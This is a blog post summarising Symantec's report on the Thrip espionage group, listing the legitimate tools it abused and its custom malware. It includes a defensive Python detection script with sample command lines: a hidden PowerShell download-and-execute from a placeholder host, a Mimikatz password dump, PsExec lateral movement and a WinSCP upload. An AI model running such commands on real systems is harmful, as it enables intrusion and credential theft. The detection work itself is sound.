Thrip - A Chinese hacker group is targeting the US and Southeast Asia!

Hello everyone!

    Welcome to NewAgeInformers, where we believe in sharing knowledge. Today we are going to talk about a Chinese group of hackers and their attempts to target satellite and defence companies in the United States and Southeast Asia.


    A group of Chinese hackers named "Thrip" is nowadays targeting satellite and defence companies, as well as telecom companies. Their victims are organizations that contract software development work related to the satellite, telecom and defence sectors. To hide its actions, the group combines custom malware with legitimate system processes and tools, a trick that also reduces the risk of getting caught.

    A team of security researchers from Symantec disclosed the re-emerged Thrip campaign. After discovering it they stated, "We identified three computers in China being used to launch the Thrip attacks. Thrip's motive is likely espionage and its targets include those in the communications, geospatial imaging, and defence sectors, both in the United States and Southeast Asia." In this latest campaign Thrip changed its methods: instead of relying on a single piece of malware, it used a combination of custom malware and open source tools. The custom malware is used to steal information from the infected computer, including login credentials.

    Thrip's list of victims spans the communications, geospatial imaging and defence sectors in both the United States and Southeast Asia. Their first victim was the production unit of a target, where they executed the malware on the computers used to monitor and control satellites. Their second target was organizations dealing with geospatial mapping and imaging; here too they went after the operational side of the organization to deploy malware, mainly targeting computers running MapXtreme GIS (Geographic Information System) software.

    In their third round of attacks, they targeted three distinct telecom operators, mostly located in Southeast Asia. In every attack they went after the operational side only. According to the Symantec researchers, the tools and malware used by Thrip are listed below with short descriptions.

Legitimate tools abused by the Thrip hacker group:-

PsExec: Microsoft Sysinternals tool for executing processes on other systems. The tool was primarily used by the attackers to move laterally on the victim's network.

PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse the compromised network, and carry out reconnaissance.

Mimikatz: Freely available tool capable of changing privileges, exporting security certificates, and recovering Windows passwords in plaintext.

WinSCP: Open source FTP client used to exfiltrate data from targeted organizations.

LogMeIn: Cloud-based remote access software. It's unclear whether the attackers gained unauthorized access to the victims' LogMeIn accounts or whether they created their own.
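Because every tool in the list above is legitimate software, the defensive question is how to spot its misuse in ordinary endpoint telemetry. The following Python is an added example (not from the original post or from Symantec) that triages constructed Windows process-creation and service-install records for the usage patterns described here: PsExec lateral movement, PowerShell payload downloads, Mimikatz credential dumping and WinSCP uploads. All host names, command lines and 203.0.113.x addresses are constructed sample data, not indicators from the campaign.

```python
import re
from typing import Dict, List, Set

# Constructed sample records (not real telemetry), shaped like Windows
# Security 4688 (process creation) and System 7045 (service install) events.
# Host names and 203.0.113.x addresses are placeholders.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 4688, "host": "sat-ctl-01", "cmd": r"C:\Tools\PsExec.exe \\sat-ctl-02 -s cmd.exe"},
    {"id": 7045, "host": "sat-ctl-02", "cmd": r"%SystemRoot%\PSEXESVC.exe"},
    {"id": 4688, "host": "sat-ctl-02", "cmd": "powershell.exe -nop -w hidden -c "
     "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/p')\""},
    {"id": 4688, "host": "gis-ws-07", "cmd": r"C:\Users\ops\m.exe privilege::debug sekurlsa::logonpasswords"},
    {"id": 4688, "host": "gis-ws-07", "cmd": r'"C:\Program Files\WinSCP\WinSCP.exe" /command "open sftp://u@203.0.113.9" "put C:\export\*"'},
    {"id": 4688, "host": "gis-ws-07", "cmd": "powershell.exe Get-Service"},  # benign admin use, must not alert
]

# One detection rule per abused tool, matched against the command line.
RULES = [
    ("PsExec lateral movement", re.compile(r"psexec\.exe\s+\\\\|PSEXESVC", re.I)),
    ("PowerShell payload download", re.compile(r"powershell.*(DownloadString|DownloadFile|Invoke-WebRequest|\s-enc)", re.I)),
    ("Mimikatz credential dumping", re.compile(r"sekurlsa::|lsadump::|privilege::debug", re.I)),
    ("WinSCP bulk upload (possible exfiltration)", re.compile(r"winscp\.exe.*\b(s?ftp|scp)://.*\bput\b", re.I)),
]

def triage(events: List[Dict]) -> List[Dict]:
    """Return one finding per (event, rule) pair whose command line matches."""
    findings = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmd"]):
                findings.append({"host": ev["host"], "id": ev["id"], "rule": name, "cmd": ev["cmd"]})
    return findings

def hosts_with_lateral_then_download(findings: List[Dict]) -> Set[str]:
    """Hosts showing both a PsExec trace and a PowerShell download: the pattern of a
    remote service install followed by payload retrieval on the newly reached host."""
    by_host: Dict[str, Set[str]] = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["rule"])
    return {h for h, rules in by_host.items()
            if "PsExec lateral movement" in rules and "PowerShell payload download" in rules}

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['host']}] event {f['id']} - {f['rule']}: {f['cmd'][:70]}")
    print("lateral movement followed by download on:", hosts_with_lateral_then_download(triage(SAMPLE_EVENTS)))
```

The benign `Get-Service` record shows why the PowerShell rule keys on download cmdlets rather than on the interpreter itself; real deployments would feed Sysmon or EDR command-line fields in place of the constructed list.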


Custom malware:-

Trojan.Rikamanu: A custom Trojan designed to steal information from an infected computer, including credentials and system information.

Infostealer.Chatchamas: Based on Rikamanu, this malware contains additional features designed to avoid detection. It also includes a number of new capabilities, such as the ability to capture information from newer applications that have emerged since the original Trojan.Rikamanu malware was created.

Trojan.Mycicil: A keylogger known to have been created by underground Chinese hackers. Although publicly available, it is not frequently seen.

Backdoor.Spedear: Although not seen in this recent wave of attacks, Spedear is a backdoor Trojan that has been used by Thrip in other campaigns.

Trojan.Syndicasec: Another Trojan used by Thrip in previous campaigns.

    That's all for today guys, see you in the next, even more interesting posts. To stay updated and connected, follow us here:

Twitter: @NewAgeInformers

Instagram: @new_age_informers_
